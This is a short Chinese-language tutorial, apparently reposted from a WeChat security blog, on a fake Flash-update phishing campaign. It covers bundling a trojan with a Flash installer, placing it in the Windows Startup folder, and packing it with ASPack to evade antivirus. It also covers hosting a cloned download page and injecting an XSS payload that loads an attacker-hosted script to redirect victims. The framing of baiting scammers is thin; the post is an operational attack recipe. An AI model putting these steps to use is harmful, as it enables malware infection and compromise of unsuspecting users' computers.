flash钓鱼

前言

        发现一个好玩的github项目，正好，最近手机上老是收到莫名的诈骗短信，我决定钓一波。

准备钓鱼套件https://github.com/r00tSe7en/Flash-Pop 美化版
https://github.com/hackxc/xss_flash 普通版

1.生成木马并捆绑flash的安装程序

 

将木马与flash安装程序捆绑一起

木马解压位置:windows的自启动目录，这个百度钓鱼钓时间长就知道了。你要高兴，放桌面都行。

这地方让对方下载后，不要急着让木马启动，电脑都会装杀毒，如果免杀不到位，一运行就凉了。所以开机启动是最保险。

C:ProgramDataMicrosoftWindowsStartMenuProgramsStartup

https://www.winrar.com.cn/   winrar下载地址

 

 

 

 

 

3、简单做一下木马免杀

我们选取的加壳软件是ASPack，语言改成中文。剩下打开木马，压缩就好了。

一般能免杀10天左右。

 

4、在文件index.html “立即下载位置”链接改为 木马名字+后缀。放到目录。（这个页面可以直接访问使用）

由于是中英文切换的所以英文页面也要改一下。

5、修改一下version.js文件中的链接，为自己的钓鱼页面。（主要与XSS直接配合使用）

 

6、我比较喜欢用宝塔，我们新建一个站点，填好域名，改为静态后，将源码放入对应的网站目录下。

没有服务器和域名怎么办 http://www.webweb.com/   香港云可以白嫖

7、下面开始钓鱼

如果你想利用XSS钓鱼

可以使用src标签 构造payload:<scriptsrc="http://www.xx.com/Flash.cn/version.js"> </script>

提示:护网中最好使用域名相近的域名。

我们找一个存在XSS的网站，在存在异常的参数位置，输入构造的payload，点击确定后，就会跳转到我们钓鱼页面。

8、对方下载安装后，成功上线。

 

 

 

 

本文始发于微信公众号（Khan安全攻防实验室）：flash钓鱼